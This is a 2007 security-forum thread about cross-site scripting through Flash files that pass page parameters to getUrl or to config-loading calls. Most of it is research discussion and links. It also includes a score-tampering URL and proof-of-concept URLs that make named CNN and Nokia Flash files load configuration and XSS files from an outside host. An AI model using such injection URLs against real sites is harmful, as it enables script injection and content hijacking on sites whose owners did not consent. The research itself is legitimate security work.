Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS via flash ... your opnion is welcome
Posted by: xxradar
Date: October 10, 2007 04:11PM

Hi everyone,
Just new to the forum (so maybe I'm tellin old news).

During the last couple of days I've been doing some web app testing against a series of websites using quite some .swf objects. I started to decompile a bunch of these flash files and found out that quite a few of them simply call the getUrl method, using parameters provided via the HTML page.

In no time, I even found examples that include a simple check to verify if the parameter is defined externally or not (in the latter case, i takes a default value). In this case the vektor is almost invisible, unless decompiled.

It is no secret that the getUrl can execute javascript:...., but it is apparently very easy to inject this directly via the address bar by calling the swf drectly with a parameter. (I tried some encoding techniques and they worked fine to.)

Does anyone has some references or more info on the subject?

Looking for an example? The flash on www.Astalavista.net is a perfect example. Download it locally and decompile the swf file using flare. It is very easy to spot the paramters and how to call them via the address bar. I copied the flash on a local webserver and got very good results in injecting scripting.

Feedback is most welcome.

Options: ReplyQuote
Re: XSS via flash ... your opnion is welcome
Posted by: kuza55
Date: October 10, 2007 06:56PM

Yep, there's some really good work on that subject by Stefano Di Paolo, fukami & others, here are some links which may interest you:

http://www.wisec.it/sectou.php?id=464dd35c8c5ad
https://www.flashsec.org/mediawiki/images/8/8a/CCCampFlashSec.pdf
https://www.flashsec.org/wiki/Articles

And the FlashSec wiki is pretty good in general as well.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Re: XSS via flash ... your opnion is welcome
Posted by: Gareth Heyes
Date: October 11, 2007 04:00AM

This flaw has been around for ages but I'm surprised why it hasn't been exploited more often. Especially when you consider that global variables can be injected into Flash for things like online games, were you can win prizes for the top scores ;) Of course you can call the scoreboard code directly but some Flash games encode things.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: XSS via flash ... your opnion is welcome
Posted by: kuza55
Date: October 11, 2007 04:45AM

Gareth Heyes Wrote:
-------------------------------------------------------
> Especially when you consider that global variables
> can be injected into Flash for things like online
> games, were you can win prizes for the top scores
> ;) Of course you can call the scoreboard code
> directly but some Flash games encode things.

According to FlashSec (i.e. fukami), this behaviour has been removed in AS3: https://www.flashsec.org/wiki/Overwriting_Global_Variables

And even if Flash encodes things, you can always just recompile your own version, so the variable injection issue is really pretty irrelevant to Flash games.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Re: XSS via flash ... your opnion is welcome
Posted by: Gareth Heyes
Date: October 11, 2007 05:57AM

Yeah I know that but why bother to download and recompile when sometimes you can just do:-

game.swf?total=1000

I thought it was cool anyway

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: XSS via flash ... your opnion is welcome
Posted by: fukami
Date: October 12, 2007 10:00AM

What I find even more funny is to overwrite config data used with XML.data(). So it possible to use a foreign movie with your own content =)

Some Examles:
* CNN "v0t3 t3h l33t": http://www.cnn.com/ELECTION/2008/debates/scorecard/DebateScoreCard.swf?CNN_configUrl=http://cnn.website-security.org/config.xml
* CNN XSS: http://www.cnn.com/ELECTION/2008/debates/scorecard/DebateScoreCard.swf?CNN_configUrl=http://cnn.website-security.org/xss.xml
* Original site: http://www.cnn.com/ELECTION/2008/debates/scorecard/

* Nokia offers OpenMoko: http://www.nokia.com/EUROPE_NOKIA_COM_3/Get_Support/Software/Mac_Support/flash/download.swf?optionsfile=http://nokia.website-security.org/config.xml
* Nokia XSS: http://www.nokia.com/EUROPE_NOKIA_COM_3/Get_Support/Software/Mac_Support/flash/download.swf?optionsfile=http://nokia.website-security.org/xss.xml
* Original site (gone?!): http://www.nokia.com/A4299040p

Options: ReplyQuote
Re: XSS via flash ... your opnion is welcome
Posted by: Gareth Heyes
Date: October 12, 2007 11:51AM

@fukami

Hehe excellent!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote


Sorry, only registered users may post in this forum.